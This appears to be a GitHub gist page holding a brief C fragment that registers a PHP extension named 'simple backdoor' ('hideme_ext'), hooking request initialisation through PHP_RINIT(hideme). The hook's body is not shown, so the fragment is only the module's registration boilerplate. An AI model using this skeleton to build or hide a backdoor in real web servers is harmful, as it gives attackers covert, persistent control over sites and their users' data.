Skip to content

Instantly share code, notes, and snippets.

@akamajoris
Created August 20, 2014 01:25
Show Gist options
  • Save akamajoris/295205177ca1ed6fed54 to your computer and use it in GitHub Desktop.
Save akamajoris/295205177ca1ed6fed54 to your computer and use it in GitHub Desktop.
zend_module_entry hideme_ext_module_entry = {
STANDARD_MODULE_HEADER,
"simple backdoor",
NULL,
NULL,
NULL,
PHP_RINIT(hideme),
NULL,
NULL,
"1.0",
STANDARD_MODULE_PROPERTIES
};
ZEND_GET_MODULE(hideme_ext);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment